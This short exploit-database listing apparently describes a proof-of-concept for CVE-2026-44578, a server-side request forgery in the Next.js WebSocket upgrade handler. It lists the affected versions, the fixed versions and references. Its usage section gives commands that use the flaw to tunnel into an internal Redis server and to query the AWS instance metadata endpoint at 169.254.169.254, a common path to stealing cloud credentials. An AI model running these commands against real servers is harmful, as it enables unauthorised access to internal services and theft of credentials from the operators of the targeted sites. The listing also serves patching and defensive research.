Share
## https://sploitus.com/exploit?id=81295CB4-B089-54E0-B6FF-1FACB4C142ED
# CVE-2026-44578 - Next.js WebSocket SSRF PoC
**Vulnerability:** Server-Side Request Forgery in Next.js WebSocket upgrade handler (13.4.13 โ 15.5.15, 16.0.0 โ 16.1.6)
## Usage
```bash
# Detect vulnerability
python3 poc.py target.com:3000 --detect
# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"
# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"
```
## Fix
Upgrade to Next.js 15.5.16 or 16.2.5
## References
- https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
- GHSA-c4j6-fc7j-m34r